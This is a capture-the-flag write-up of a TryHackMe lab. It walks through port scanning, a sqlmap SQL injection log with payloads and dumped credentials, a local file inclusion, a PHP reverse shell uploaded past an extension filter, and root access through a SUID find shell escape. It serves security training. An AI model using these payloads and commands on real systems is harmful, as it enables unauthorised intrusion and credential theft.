This writeup walks you through a room on TryHackMe created by tryhackme and 1337rce
1 - Port Scan
1a - Discovery
βββ(kaliγΏkali)-[~]
ββ$ sudo nmap -sS -T4 -p- 10.10.98.61
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 22:16 EEST
Nmap scan report for 10.10.98.61
Host is up (0.11s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
1337/tcp open waste
1883/tcp open mqtt
Nmap done: 1 IP address (1 host up) scanned in 307.40 seconds
1b - Versioning and OS fingerprinting
1c - Vulners
2 - Port 1337
2a - Dirbusting
2b - /admin - false lead
The form does not work at all. No communication with the backend at all
2c - /admin_101
2ci - Probing
In the bottom right, we can clearly see that the email field in directly inserted in an SQL statement without sanitization
We should input the password cracked earlier using SQLmap
Hint clearly points at an LFI using GET parameters
We add ?file=/etc/passwd to URL, we are asked again for the same password
Voila! We can see the username we need is 'zeamkish'
3b - /upload
Form only allows upload of png files
Getting PHP reverse shell code and saving it in rev_php.png
Upload can send the file now that extension is .png
We intercept the request with Burp and change the filename's extension to php before forwarding
Reverse shell code has been infiltrated to the target machine. We still need to detonate it. The hint below helps us
We can execute the reverse shell!
Now that we have the SSH credentials, let us exit the dumb reverse shell and connect via SSH instead. Much more convenient.
4 - PrivEsc - Lucked out!
After I tried looking for something interesting in sudo -l, I began listing programs that are usually owned by root and that could have the SUID bit set. First try, find!
βββ(kaliγΏkali)-[~]
ββ$ sqlmap -u http://10.10.89.22:1337/admin_101/includes/user_login.php --data "email=*&password=*" --dump
___
__H__
___ ___[']_____ ___ ___ {1.8.4#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:27:04 /2024-04-30/
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
[21:27:05] [INFO] resuming back-end DBMS 'mysql'
[21:27:05] [INFO] testing connection to the target URL
[21:27:05] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[21:27:05] [INFO] testing if the target URL content is stable
[21:27:05] [INFO] target URL content is stable
[21:27:05] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[21:27:06] [INFO] (custom) POST parameter '#1*' appears to be dynamic
[21:27:06] [INFO] heuristic (basic) test shows that (custom) POST parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[21:27:06] [INFO] heuristic (XSS) test shows that (custom) POST parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[21:27:06] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[21:27:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:27:11] [WARNING] reflective value(s) found and filtering out
[21:27:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:27:12] [INFO] testing 'Generic inline queries'
[21:27:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:27:20] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:27:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[21:27:33] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:27:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:27:57] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:28:10] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:28:23] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:28:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:28:37] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
[21:28:37] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:28:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:28:37] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:28:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:28:38] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[21:28:38] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[21:28:38] [INFO] testing 'MySQL inline queries'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[21:28:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[21:28:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[21:28:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:28:49] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[21:28:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:28:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:28:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:28:53] [INFO] target URL appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[21:29:07] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[21:29:07] [INFO] testing 'MySQL UNION query (60) - 21 to 40 columns'
[21:29:11] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
[21:29:14] [INFO] testing 'MySQL UNION query (60) - 61 to 80 columns'
[21:29:17] [INFO] testing 'MySQL UNION query (60) - 81 to 100 columns'
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 685 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: email=' AND EXTRACTVALUE(2974,CASE WHEN (2974=2974) THEN 2974 ELSE 0x3A END)-- xTMY&password=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: email=' AND GTID_SUBSET(CONCAT(0x7171716b71,(SELECT (ELT(7352=7352,1))),0x71766b7671),7352)-- PMCO&password=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=' AND (SELECT 4226 FROM (SELECT(SLEEP(5)))tBxm)-- HYpo&password=
---
[21:29:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6
[21:29:23] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:29:23] [INFO] fetching current database
[21:29:23] [INFO] retrieved: 'expose'
[21:29:23] [INFO] fetching tables for database: 'expose'
[21:29:24] [INFO] retrieved: 'config'
[21:29:24] [INFO] retrieved: 'user'
[21:29:24] [INFO] fetching columns for table 'config' in database 'expose'
[21:29:24] [INFO] retrieved: 'id'
[21:29:24] [INFO] retrieved: 'int'
[21:29:25] [INFO] retrieved: 'url'
[21:29:25] [INFO] retrieved: 'text'
[21:29:25] [INFO] retrieved: 'password'
[21:29:25] [INFO] retrieved: 'text'
[21:29:25] [INFO] fetching entries for table 'config' in database 'expose'
[21:29:25] [INFO] retrieved: '/file1010111/index.php'
[21:29:25] [INFO] retrieved: '1'
[21:29:26] [INFO] retrieved: '69c66901194a6486176e81f5945b8929'
[21:29:26] [INFO] retrieved: '/upload-cv00101011/index.php'
[21:29:26] [INFO] retrieved: '3'
[21:29:26] [INFO] retrieved: '// ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z'
[21:29:26] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[21:29:35] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[21:29:38] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[21:29:41] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:29:41] [INFO] starting 4 processes
[21:29:43] [INFO] cracked password 'easytohack' for hash '69c66901194a6486176e81f5945b8929'
Database: expose
Table: config
[2 entries]
+----+------------------------------+-----------------------------------------------------+
| id | url | password |
+----+------------------------------+-----------------------------------------------------+
| 1 | /file1010111/index.php | 69c66901194a6486176e81f5945b8929 (REDACTED_BY_ME) |
| 3 | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
+----+------------------------------+-----------------------------------------------------+
[21:29:46] [INFO] table 'expose.config' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.89.22/dump/expose/config.csv'
[21:29:46] [INFO] fetching columns for table 'user' in database 'expose'
[21:29:46] [INFO] retrieved: 'id'
[21:29:46] [INFO] retrieved: 'int'
[21:29:47] [INFO] retrieved: 'email'
[21:29:47] [INFO] retrieved: 'varchar(512)'
[21:29:47] [INFO] retrieved: 'password'
[21:29:47] [INFO] retrieved: 'varchar(512)'
[21:29:47] [INFO] retrieved: 'created'
[21:29:47] [INFO] retrieved: 'timestamp'
[21:29:47] [INFO] fetching entries for table 'user' in database 'expose'
[21:29:48] [INFO] retrieved: '2023-02-21 09:05:46'
[21:29:48] [INFO] retrieved: '[email protected]'
[21:29:48] [INFO] retrieved: '1'
[21:29:48] [INFO] retrieved: 'VeryDifficultPassword!!#@#@!#!@#1231'
Database: expose
Table: user
[1 entry]
+----+-----------------+---------------------+--------------------------------------+
| id | email | created | password |
+----+-----------------+---------------------+--------------------------------------+
| 1 | [email protected] | 2023-02-21 09:05:46 | REDACTED_BY_ME |
+----+-----------------+---------------------+--------------------------------------+
[21:29:48] [INFO] table 'expose.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.89.22/dump/expose/user.csv'
[21:29:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.89.22'
[*] ending @ 21:29:48 /2024-04-30/
βββ(kaliγΏkali)-[~]
ββ$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.89.22] 36222
Linux ip-10-10-89-22 5.15.0-1039-aws #44~20.04.1-Ubuntu SMP Thu Jun 22 12:21:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
19:17:49 up 2:16, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (781): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-10-89-22:/$ cd /home/zeamkish
www-data@ip-10-10-89-22:/home/zeamkish$ ls -la
ls -la
total 36
drwxr-xr-x 3 zeamkish zeamkish 4096 Jul 6 2023 .
drwxr-xr-x 4 root root 4096 Jun 30 2023 ..
-rw-rw-r-- 1 zeamkish zeamkish 5 Jul 6 2023 .bash_history
-rw-r--r-- 1 zeamkish zeamkish 220 Jun 8 2023 .bash_logout
-rw-r--r-- 1 zeamkish zeamkish 3771 Jun 8 2023 .bashrc
drwx------ 2 zeamkish zeamkish 4096 Jun 8 2023 .cache
-rw-r--r-- 1 zeamkish zeamkish 807 Jun 8 2023 .profile
-rw-r----- 1 zeamkish zeamkish 27 Jun 8 2023 flag.txt
-rw-rw-r-- 1 root zeamkish 34 Jun 11 2023 ssh_creds.txt
www-data@ip-10-10-89-22:/home/zeamkish$ cat ssh_creds.txt
cat ssh_creds.txt
SSH CREDS
zeamkish
REDACTED_BY_ME
βββ(kaliγΏkali)-[~]
ββ$ ssh [email protected]The authenticity of host '10.10.89.22 (10.10.89.22)' can't be established.
ED25519 key fingerprint is SHA256:QVicBVNdk7FT/JLQ+djdhP3mB3y9OFF2iwsRiOoECNY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.89.22' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-1039-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 30 19:22:42 UTC 2024
System load: 0.0 Processes: 126
Usage of /: 13.3% of 58.09GB Users logged in: 0
Memory usage: 18% IPv4 address for eth0: 10.10.89.22
Swap usage: 0%
* Ubuntu Pro delivers the most comprehensive open source security and
compliance features.
https://ubuntu.com/aws/pro
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun Jul 2 17:27:46 2023 from 10.10.83.109
zeamkish@ip-10-10-89-22:~$ cat flag.txt
THM{}
zeamkish@ip-10-10-89-22:~$
zeamkish@ip-10-10-89-22:~$ ls -la /usr/bin/find
-rwsr-x--- 1 root zeamkish 320160 Feb 18 2020 /usr/bin/find
zeamkish@ip-10-10-89-22:~$ find . -exec /bin/sh -p \; -quit
# cd /root
# ls
flag.txt snap
# cat flag.txt
THM{}
